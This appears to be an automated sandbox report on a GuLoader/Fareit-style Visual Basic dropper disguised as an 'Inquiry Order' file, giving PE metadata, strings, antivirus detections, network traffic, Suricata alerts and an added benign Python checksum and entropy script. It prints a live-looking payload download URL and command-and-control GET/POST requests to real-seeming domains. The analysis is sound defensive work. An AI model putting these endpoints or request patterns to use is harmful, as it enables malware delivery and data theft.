oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
sxs.dll.SxsOleAut32MapIIDOrCLSIDToTypeLibrary
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
asycfilt.dll.FilterCreateInstance
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptGenRandom
kernel32.dll.NlsGetCacheUpdateCount
version.dll.VerQueryValueA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
kernel32.dll.GetCalendarInfoW
ws2_32.dll.#23
ws2_32.dll.#21
ws2_32.dll.WSAIoctl
ws2_32.dll.#3
ws2_32.dll.#116
iphlpapi.dll.NotifyIpInterfaceChange
api-ms-win-downlevel-ole32-l1-1-0.dll.CoInitializeEx
api-ms-win-downlevel-advapi32-l1-1-0.dll.EventWrite
api-ms-win-downlevel-ole32-l1-1-0.dll.CoCreateInstance
iphlpapi.dll.GetAdaptersAddresses
iphlpapi.dll.NotifyUnicastIpAddressChange
ws2_32.dll.GetAddrInfoW
oleaut32.dll.#8
oleaut32.dll.#9
oleaut32.dll.DllGetClassObject
oleaut32.dll.DllCanUnloadNow
advapi32.dll.RegOpenKeyW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
api-ms-win-downlevel-ole32-l1-1-0.dll.StringFromIID
api-ms-win-downlevel-ole32-l1-1-0.dll.CoUninitialize
oleaut32.dll.#500
ws2_32.dll.#5
api-ms-win-downlevel-ole32-l1-1-0.dll.CoSetProxyBlanket
ole32.dll.ObjectStublessClient10
oleaut32.dll.#2
ole32.dll.CoTaskMemFree
api-ms-win-downlevel-advapi32-l1-1-0.dll.RegEnumKeyExW
oleaut32.dll.#6
api-ms-win-downlevel-advapi32-l1-1-0.dll.UnregisterTraceGuids
cryptsp.dll.CryptReleaseContext
Executed Commands

"C:\Users\Louise\AppData\Local\Temp\Sri Lank Inquiry Order.pif"

PE Information

Image Base: 0x00400000
Entry Point: 0x004014c0
Reported Checksum: 0x0001fc67
Actual Checksum: 0x0001fc67
Minimum OS Version: 4.0
Compile Time: 2011-12-12 20:46:08
Import Hash: 776b8356f2fccf1bfac204822980b612
Icon Exact Hash: e9e29b011f9c987794720c4dbfb35cc0
Icon Similarity Hash: 1194d1c691076da6673b28511843bbd9

Sections

Name RAW Address Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00001000 0x0000f01c 0x00010000 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.79
.data 0x00011000 0x00011000 0x00000e8c 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x00012000 0x00012000 0x000015a0 0x00002000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 3.15
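
The checksum, entropy and signature columns above come straight from the PE headers and section bytes. The script below, added here as an example and not taken from CAPE or from the sample's author, recomputes them with the Python standard library only: the per-section entropy of the Sections table, the Reported vs Actual Checksum pair (the algorithm behind CheckSumMappedFile), and the Security data directory test that yields SignTool's "No signature found" under the Authenticode signature above. It runs on a minimal PE32 that it builds itself, so FILE_ALIGN, SECTION_ALIGN and the section names and contents are assumptions of the example, not the report's sample.

```python
"""Added example: recompute the PE Information / Sections columns and the
Authenticode presence check from raw bytes, standard library only.
The image it runs on is a constructed minimal PE32, not the report's sample."""
import math
import struct

FILE_ALIGN = 0x200      # assumed layout constants for the constructed image
SECTION_ALIGN = 0x1000


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 .. 8.0, as in the Sections table's Entropy column."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def pe_checksum(image: bytes, checksum_offset: int) -> int:
    """The 'Actual Checksum' column: CheckSumMappedFile's algorithm, i.e. the
    32-bit words folded into a 16-bit end-around-carry sum, skipping the
    CheckSum field itself, plus the file length."""
    padded = image + b"\0" * (-len(image) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(image)


def parse_pe(image: bytes) -> dict:
    """Pull out the fields the report's PE tables are built from."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]     # 0x10B PE32, 0x20B PE32+
    checksum_off = opt + 0x40                           # same offset for both formats
    reported = struct.unpack_from("<I", image, checksum_off)[0]
    # Data directory 4 (IMAGE_DIRECTORY_ENTRY_SECURITY) holds the Authenticode
    # blob; size 0 is what SignTool reports as "No signature found".
    dir_base = opt + (0x60 if magic == 0x10B else 0x70)
    _sec_off, sec_size = struct.unpack_from("<II", image, dir_base + 4 * 8)
    sections, hdr = [], opt + opt_size
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, hdr + 40 * i)
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode(), "virtual_address": va,
                         "virtual_size": vsize, "raw_ptr": raw_ptr, "raw_size": raw_size,
                         "entropy": round(shannon_entropy(raw), 2)})
    return {"reported_checksum": reported, "actual_checksum": pe_checksum(image, checksum_off),
            "has_authenticode": sec_size != 0, "sections": sections}


def _round_up(n: int, align: int) -> int:
    return -(-n // align) * align


def build_minimal_pe(sections) -> bytes:
    """Constructed PE32 image from (name, bytes) pairs; CheckSum left at 0."""
    e_lfanew, opt_size = 0x80, 0xE0
    raw_ptr = _round_up(e_lfanew + 4 + 20 + opt_size + 40 * len(sections), FILE_ALIGN)
    headers, blobs, va = b"", b"", SECTION_ALIGN
    for name, data in sections:
        raw_size = _round_up(len(data), FILE_ALIGN)
        headers += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(data), va,
                               raw_size, raw_ptr + len(blobs), 0, 0, 0, 0, 0x60000020)
        blobs += data.ljust(raw_size, b"\0")
        va += _round_up(len(data), SECTION_ALIGN)
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0x00, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 0x1C, 0x400000)                    # ImageBase
    struct.pack_into("<II", opt, 0x20, SECTION_ALIGN, FILE_ALIGN)  # alignments
    struct.pack_into("<II", opt, 0x38, va, raw_ptr)                # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 0x5C, 16)                          # NumberOfRvaAndSizes
    image = dos + b"PE\0\0" + coff + bytes(opt) + headers
    return image.ljust(raw_ptr, b"\0") + blobs


def stamp_checksum(image: bytes) -> bytes:
    """Write the computed value into the CheckSum field (what link /RELEASE does)."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    off = e_lfanew + 4 + 20 + 0x40
    out = bytearray(image)
    struct.pack_into("<I", out, off, pe_checksum(image, off))
    return bytes(out)


if __name__ == "__main__":
    sample = stamp_checksum(build_minimal_pe([(b".text", bytes(range(256)) * 2),
                                              (b".data", b"\0" * 0x100)]))
    info = parse_pe(sample)
    print(f"checksum reported=0x{info['reported_checksum']:08x} actual=0x{info['actual_checksum']:08x} "
          f"authenticode={info['has_authenticode']}")
    for s in info["sections"]:
        print(f"{s['name']:<6} va=0x{s['virtual_address']:08x} entropy={s['entropy']:.2f}")
```

To run it on a real file, replace the built image with the bytes of the file; a reported checksum of 0 or one that differs from the actual value is common for unsigned, hand-packed binaries and worth noting next to the AV results, whereas a match, as in this report, says nothing about the file's intent.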

Resources

Name Offset Size Language Sub-language Entropy File type
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_ICON 0x000123e8 0x00000ea8 LANG_NEUTRAL SUBLANG_NEUTRAL 4.09 None
RT_GROUP_ICON 0x000123b8 0x00000030 LANG_NEUTRAL SUBLANG_NEUTRAL 3.07 None
RT_VERSION 0x00012150 0x00000268 LANG_CATALAN SUBLANG_DEFAULT 3.24 None

Imports

MSVBVM60.DLL (entries listed as None are imported by ordinal only and carry no name in the import table)

0x401000 None
0x401004 None
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 None
0x40101c __vbaStrVarMove
0x401020 __vbaFreeVarList
0x401024 _adj_fdiv_m64
0x401028 None
0x40102c __vbaFreeObjList
0x401030 None
0x401034 _adj_fprem1
0x401038 __vbaStrCat
0x40103c None
0x401040 None
0x401048 None
0x40104c _adj_fdiv_m32
0x401050 None
0x401054 None
0x401058 None
0x40105c __vbaObjSet
0x401060 _adj_fdiv_m16i
0x401064 _adj_fdivr_m16i
0x401068 None
0x40106c None
0x401070 __vbaFpR8
0x401074 _CIsin
0x401078 __vbaChkstk
0x40107c EVENT_SINK_AddRef
0x401080 None
0x401084 __vbaStrCmp
0x401088 __vbaVarTstEq
0x40108c None
0x401090 None
0x401094 None
0x401098 __vbaCastObjVar
0x40109c None
0x4010a0 _adj_fpatan
0x4010a4 None
0x4010a8 EVENT_SINK_Release
0x4010ac __vbaUI1I2
0x4010b0 _CIsqrt
0x4010b8 __vbaExceptHandler
0x4010bc None
0x4010c0 _adj_fprem
0x4010c4 _adj_fdivr_m64
0x4010c8 None
0x4010cc None
0x4010d0 __vbaFPException
0x4010d4 None
0x4010d8 _CIlog
0x4010dc __vbaNew2
0x4010e0 _adj_fdiv_m32i
0x4010e4 _adj_fdivr_m32i
0x4010e8 __vbaStrCopy
0x4010ec __vbaFreeStrList
0x4010f0 None
0x4010f4 _adj_fdivr_m32
0x4010f8 _adj_fdiv_r
0x4010fc None
0x401100 None
0x401104 None
0x401108 None
0x40110c __vbaVarDup
0x401110 None
0x401118 _CIatan
0x40111c __vbaStrMove
0x401120 __vbaUI1Str
0x401124 _allmul
0x401128 None
0x40112c _CItan
0x401130 None
0x401134 _CIexp
0x401138 __vbaFreeStr
0x40113c __vbaFreeObj

!This program cannot be run in DOS mode.
.text
`.data
.rsrc
MSVBVM60.DLL
Vulkanby5
uv3:O
traceabl
Smutte4
"Exif
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
O\mSTXZf
hmq{io
oj>ojtq
I%I$~Y
I+N;?
~oje^
Eu3X[
`O:d_
9>V|}
SE[[{
T.dY.
Q[ky6
ui.ty
x~I4[VY
>|WIk
'q$2-
Yl4H.
8~&|O
2[]\/
=RFy<
Kvi7o
H$_5S
sm#mm
Gc}ukoy
Z+}V%m
wQW.Of
4L;)q
S/yTS
4LS/dHW
4Ll#(M
{`pCQ
.S`pCU
d&TYahW
(_49X
4L(^58
{YAhS
-Il*a4L
;-Il*a4j
4LSOuY
4LSYA(
YA4SN
4L"#4M
49Dd<LS
4LW-Il*a4h
4L*a4N
lAX(a6
W-Il*a4n
4L;YA(W
-Il*a4L
/AlW-qlrv
4LW-k
4}]Zb
4L(e6
;/|l
5C/)4L
WYAhC
/vM +
^Lrv^L
4LB.2L
/lXrv
4L;- G*\P
A_S`0G
(_49pZ
TC/$4L
4LSM'
/;*(g6*"
YAtCT(L
^^N"N1L
4L(e0
4LC7%L
{Ya|S%
;-yl*g4
S-il*e4
4Lrvl
-t\(ft
sd0Lrv
6^IWYd\SM
-IlS'
Hrv^LW
4LS/qd;6
|Ci=L
/qtS-yP;
4LS-yP;
T/d\S-yT
4L;/q4S-yT
lDtSN^D
4LS/q,h^
[L;N%
4Lrvd
4L;N_L
(g6*(
AqW6\
4L(^49
Ms-|T"
<9w-A\
)0GW%
H(_,9DY
S/0FW%
(Y40u'
(21}/
(^4C.
L[YKC/
@QS%KX
(e6ux
*3(~Cy
4L;/dOm
W-gJ;%
(_69F
'OITFAVrv
TY^lC
49[&OI
@AW`w
9Y&OH
(e0}b6
rv^lWN7L
C/14L
\(f0us
(_41]Z
rv;2bZ;2qZ
$&?ed
Kj#Q$
~ZQ/S
._6I%
<Egyu&
[=Yn5H
huKth
k?/t?=:
}t7^e
<Qqmk2
y$k$v
3-tS1
i4=SZ
DRKq/
8Ws=~
y.#o>T
x~I?w
_5[sm
kK]>YW~
Coq,s
U~_)~o
x^7I7,
]I4}/P
x]y_:
333333334
eUUUUW
D9510
%),//
/96-*1H
$,6981)!
MGB?>>ABFL
Smutte4
Check1
Prsupponerer1
GENNEMBOREDES
Option3
uddanne
Option2
Milie
Option1
Line2
Line1
VB5!6&*
Resupplyingp
Vulkanby5
Vulkanby5
Vulkanby5
traceabl
shepindivid
EXTERMENACEA
Tyloseoptimal8
forskrkkem
parso
unexe
TYPEANGIV
Benyttelse
Milie
ophol
THERMOR
uddanne
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
GENNEMBOREDES
Check1
LYNNEDSLAGENE
kneeing
Bottomlessly
Deathcup
CROSSABILITY
kawaka
VISERENDE
Uanvendeliges
BRUGERANGIVNE
OLDFRUER
facsim
Eftergrelse3
VBA6.DLL
__vbaFpR8
__vbaVarMove
__vbaUI1Str
__vbaVarDup
__vbaFreeObjList
__vbaFreeObj
__vbaStrVarMove
__vbaFreeVarList
__vbaVarTstEq
__vbaFreeStr
__vbaStrCopy
__vbaUI1I2
__vbaCastObjVar
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
__vbaVarLateMemCallLd
__vbaFreeVar
__vbaFreeStrList
__vbaStrCat
__vbaStrMove
__vbaStrCmp
Kystklima
Volstead5
PHTHIRIUS
Solod
Larvicidal
Foruroligelserne5
UNCONTEMPTIBLY
INSTRUKTIONSKURSUS
Vngerne
Tilhrendes4
Dveskolens8
Servicefunktioners5
EKSEKUTION
Diktere1
CHEFDOM
Lornness7
RANVEIG
Forpligtelseserklrings
metea
Irradiate5
Amuck7
BRANIFF
Bestvlede6
reaccelerated
Oinks
surstyle
sammenstds
refractional
TOTALERS
brdstudiers
Merling8
SATANIZE
DONNER
Driftsikkert6
Plastiskes9
VENSTRELINEAER
Skovhugsterne1
Heautomorphism1
Whoreishly
Bryggerkedels9
tH9=
tj9=
ty9=
@tp9=
MSVBVM60.DLL
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
_adj_fdiv_m64
__vbaFreeObjList
_adj_fprem1
__vbaStrCat
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaObjSet
_adj_fdiv_m16i
_adj_fdivr_m16i
__vbaFpR8
_CIsin
__vbaChkstk
EVENT_SINK_AddRef
__vbaStrCmp
__vbaVarTstEq
__vbaCastObjVar
_adj_fpatan
EVENT_SINK_Release
__vbaUI1I2
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
_adj_fprem
_adj_fdivr_m64
__vbaFPException
_CIlog
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaStrCopy
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaVarLateMemCallLd
_CIatan
__vbaStrMove
__vbaUI1Str
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
D9510
%),//
/96-*1H
$,6981)!
MGB?>>ABFL
eUUUUW
333333334
/ P6pL
,/KPip
L3kOpEkLYZppyTY9i0RZwqFI8r197
Spiralsnoet6
somatological
annelides
Jurata
Sejrvindings
Upshoot3
KOMMUNALBESTYRELSE
aflvningerne
CONTAINMENT
CANCANENS
KATJES
medicean
FLERRIED
OLIGIST
Coatninger
Fodterapeuters
startbogstavs
Caponized9
Blokfljternes
TALVRDIEN
harpist
:20:2
Tuberculomas
Polydaemonist5
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
040304B0
LegalCopyright
Internal
LegalTrademarks
Internal
ProductName
Vulkanby5
FileVersion
ProductVersion
InternalName
Resupplyingp
OriginalFilename
Resupplyingp.exe
/ P6pL
,/KPip

Full Results

Engine: Signature (three engines per line)
Bkav: Clean | MicroWorld-eScan: Clean | CMC: Clean
CAT-QuickHeal: Clean | McAfee: Fareit-FST!3F2FD6C7F273 | Cylance: Unsafe
Zillya: Clean | SUPERAntiSpyware: Clean | Sangfor: Malware
K7AntiVirus: Clean | Alibaba: Clean | K7GW: Clean
CrowdStrike: Clean | Invincea: Clean | Baidu: Clean
F-Prot: W32/VBKrypt.AMM.gen!Eldorado | Symantec: Clean | TotalDefense: Clean
APEX: Malicious | Avast: Clean | ClamAV: Clean
Kaspersky: UDS:DangerousObject.Multi.Generic | BitDefender: Clean | NANO-Antivirus: Clean
Paloalto: generic.ml | AegisLab: Clean | Tencent: Clean
Endgame: malicious (high confidence) | Sophos: Clean | Comodo: Clean
F-Secure: Clean | DrWeb: Clean | VIPRE: Clean
TrendMicro: Clean | McAfee-GW-Edition: Clean | Fortinet: W32/Agent.HKMB!tr
Trapmine: malicious.high.ml.score | FireEye: Clean | Emsisoft: Clean
Ikarus: Clean | Cyren: W32/VBKrypt.AMM.gen!Eldorado | Jiangmin: Clean
Webroot: Clean | Avira: Clean | MAX: Clean
Antiy-AVL: Clean | Kingsoft: Clean | Arcabit: Clean
ViRobot: Trojan.Win32.Guloader.81920.G | ZoneAlarm: UDS:DangerousObject.Multi.Generic | Avast-Mobile: Clean
Microsoft: PWS:Win32/Fareit.AB!MTB | AhnLab-V3: Clean | Acronis: Clean
BitDefenderTheta: Gen:[email protected] | ALYac: Clean | TACHYON: Clean
VBA32: Clean | Malwarebytes: Trojan.MalPack.VB | Zoner: Clean
ESET-NOD32: a variant of Win32/Injector.EMGX | TrendMicro-HouseCall: Clean | Rising: Downloader.Guloader!1.C738 (CLASSIC)
Yandex: Clean | SentinelOne: DFI - Suspicious PE | eGambit: Unsafe.AI_Score_100%
GData: Clean | Ad-Aware: Clean | AVG: Clean
Cybereason: Clean | Panda: Clean | Qihoo-360: Clean

TCP

Source Source Port Destination Destination Port
192.168.1.6 49185 13.107.42.23 443
192.168.1.6 49187 13.107.42.23 443
192.168.1.6 49207 144.208.213.45 80
192.168.1.6 49205 172.217.23.99 443
192.168.1.6 22122 184.168.221.40 www.barsoum.dentist 21558
192.168.1.6 14381 184.168.221.40 www.barsoum.dentist 12614
192.168.1.6 25455 184.168.221.40 www.barsoum.dentist 30799
192.168.1.6 31350 184.168.221.40 www.barsoum.dentist 20552
192.168.1.6 17495 184.168.221.40 www.barsoum.dentist 17734
192.168.1.6 13898 184.168.221.40 www.barsoum.dentist 13665
192.168.1.6 22073 184.168.221.40 www.barsoum.dentist 26672
192.168.1.6 28022 184.168.221.40 www.barsoum.dentist 20790
192.168.1.6 22645 184.168.221.40 www.barsoum.dentist 14196
192.168.1.6 12401 184.168.221.40 www.barsoum.dentist 19832
192.168.1.6 10339 184.168.221.40 www.barsoum.dentist 25671
192.168.1.6 21364 184.168.221.40 www.barsoum.dentist 26233
192.168.1.6 27205 184.168.221.40 www.barsoum.dentist 26219
192.168.1.6 30265 184.168.221.40 www.barsoum.dentist 17990
192.168.1.6 25166 184.168.221.40 www.barsoum.dentist 25419
192.168.1.6 29545 184.168.221.40 www.barsoum.dentist 29266
192.168.1.6 18551 184.168.221.40 www.barsoum.dentist 20546
192.168.1.6 19551 184.168.221.40 www.barsoum.dentist 26712
192.168.1.6 30313 184.168.221.40 www.barsoum.dentist 25935
192.168.1.6 13901 184.168.221.40 www.barsoum.dentist 14456
192.168.1.6 26993 184.168.221.40 www.barsoum.dentist 16735
192.168.1.6 17012 184.168.221.40 www.barsoum.dentist 27241
192.168.1.6 19789 184.168.221.40 www.barsoum.dentist 29007
192.168.1.6 12596 184.168.221.40 www.barsoum.dentist 28517
192.168.1.6 20787 184.168.221.40 www.barsoum.dentist 26694
192.168.1.6 16746 184.168.221.40 www.barsoum.dentist 19543
192.168.1.6 18790 184.168.221.40 www.barsoum.dentist 19798
192.168.1.6 22885 184.168.221.40 www.barsoum.dentist 26701
192.168.1.6 27731 184.168.221.40 www.barsoum.dentist 21621
192.168.1.6 28758 184.168.221.40 www.barsoum.dentist 12921
192.168.1.6 30288 184.168.221.40 www.barsoum.dentist 29281
192.168.1.6 19764 184.168.221.40 www.barsoum.dentist 20592
192.168.1.6 21603 184.168.221.40 www.barsoum.dentist 13676
192.168.1.6 14695 184.168.221.40 www.barsoum.dentist 23139
192.168.1.6 29816 184.168.221.40 www.barsoum.dentist 30053
192.168.1.6 17491 184.168.221.40 www.barsoum.dentist 29801
192.168.1.6 29542 184.168.221.40 www.barsoum.dentist 22599
192.168.1.6 14200 184.168.221.40 www.barsoum.dentist 20309
192.168.1.6 49210 184.168.221.40 www.barsoum.dentist 80
192.168.1.6 49211 184.168.221.40 www.barsoum.dentist 80
192.168.1.6 49193 184.51.9.166 443
192.168.1.6 49189 20.36.252.129 443
192.168.1.6 49204 23.227.38.64 www.thetoptitle.com 80
192.168.1.6 49212 52.114.128.43 443
192.168.1.6 37482 52.114.132.20 14329
192.168.1.6 9072 52.114.132.20 42974
192.168.1.6 55419 52.114.132.20 7980
192.168.1.6 49191 72.21.91.29 80
192.168.1.6 49213 72.21.91.29 80
192.168.1.6 49190 8.248.135.254 80
192.168.1.6 49202 84.38.181.216 ratamodu.ga 80
23.211.5.239 443 192.168.1.6 49194

UDP

Source Source Port Destination Destination Port

DNS

Name Response Post-Analysis Lookup
ratamodu.ga A 84.38.181.216 84.38.181.216
www.mums-in.net NXDOMAIN
www.thetoptitle.com A 23.227.38.64 23.227.38.64
www.outdoorbusters.info
www.jqrsky.com
www.pbrgen.com
www.barsoum.dentist A 184.168.221.40 184.168.221.34
www.sixouyo.com

HTTP Requests

URI Data
http://ratamodu.ga/~zadmin/group/apsfb_BwRMswJ149.bin
GET /~zadmin/group/apsfb_BwRMswJ149.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: ratamodu.ga
Cache-Control: no-cache

http://www.thetoptitle.com/c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4
GET /c216/?lxldz=Nnqh7TNKIIDcqdzGNwugJZtqnGWTOdvJypW6t/M5WntLNAJT3RrvH7SpKhfW7prI&Tj=YBZ4 HTTP/1.1
Host: www.thetoptitle.com
Connection: close

http://www.barsoum.dentist/c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1
GET /c216/?lxldz=qDsuE3Dsv2OzkxyZUeXZwGu6bH8qaHXOomLR5n8tK0jzX5EyijM1plB0iZv+jWrr&Tj=YBZ4&sql=1 HTTP/1.1
Host: www.barsoum.dentist
Connection: close

http://www.barsoum.dentist/c216/
POST /c216/ HTTP/1.1
Host: www.barsoum.dentist
Connection: close
Content-Length: 81931
Cache-Control: no-cache
Origin: http://www.barsoum.dentist
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.barsoum.dentist/c216/
Accept-Language: en-US
Accept-Encoding: gzip, deflate

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.1.6 1.1.1.1 3
192.168.1.6 8.8.8.8 3
192.168.1.6 8.8.8.8 3

CIF Results

No CIF Results

Suricata Alerts

Timestamp Source IP Source Port Destination IP Destination Port Protocol GID SID REV Signature Category Severity
2020-06-05 14:09:05.129 192.168.1.6 49185 13.107.42.23 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.130 192.168.1.6 49184 13.107.42.23 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 49188 13.107.42.23 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 49186 13.107.42.23 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:05.707 192.168.1.6 49187 13.107.42.23 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:09:13.890 192.168.1.6 49193 184.51.9.166 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:09:19.013 192.168.1.6 49194 184.51.9.166 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:09:25.611 192.168.1.6 52555 8.8.8.8 53 UDP 1 2025105 3 ET INFO DNS Query for Suspicious .ga Domain Potentially Bad Traffic 2
2020-06-05 14:10:19.588 192.168.1.6 49203 20.36.252.129 443 TCP 1 2028388 2 ET JA3 Hash - Possible Malware - RigEK Unknown Traffic 3
2020-06-05 14:10:48.196 192.168.1.6 49205 172.217.23.99 443 TCP 1 2028395 2 ET JA3 Hash - Possible Malware - Various Eitest Unknown Traffic 3
2020-06-05 14:12:18.016 144.208.213.45 80 192.168.1.6 49207 TCP 1 2018959 4 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation 1
2020-06-05 14:12:18.016 144.208.213.45 80 192.168.1.6 49207 TCP 1 2014520 7 ET INFO EXE - Served Attached HTTP Misc activity 3

Suricata TLS

Timestamp Source IP Source Port Destination IP Destination Port Subject Issuer Fingerprint Version
2020-06-05 14:09:05.706 192.168.1.6 49185 13.107.42.23 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.707 192.168.1.6 49184 13.107.42.23 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.708 192.168.1.6 49188 13.107.42.23 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.708 192.168.1.6 49187 13.107.42.23 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:05.713 192.168.1.6 49186 13.107.42.23 443 CN=edge.skype.com 5c:3b:53:ee:b8:65:a3:2a:66:d4:04:36:67:98:af:88:8d:96:5d:74 TLS 1.2
2020-06-05 14:09:07.806 192.168.1.6 49189 20.36.252.129 443 CN=g.msn.com 84:07:33:ed:86:d5:52:e5:ff:20:cd:89:1e:0a:3c:00:7b:68:0d:17 TLS 1.2
2020-06-05 14:09:11.888 192.168.1.6 49192 184.51.9.166 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLS 1.2
2020-06-05 14:09:13.964 192.168.1.6 49193 184.51.9.166 443 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=*.sfx.ms 43:5a:ab:ca:cc:ab:86:4d:56:81:18:e3:e5:17:05:9b:0e:32:8c:38 TLSv1
2020-06-05 14:09:19.016 192.168.1.6 49194 184.51.9.166 443 TLSv1
2020-06-05 14:10:19.753 192.168.1.6 49203 20.36.252.129 443 CN=g.msn.com 84:07:33:ed:86:d5:52:e5:ff:20:cd:89:1e:0a:3c:00:7b:68:0d:17 TLSv1
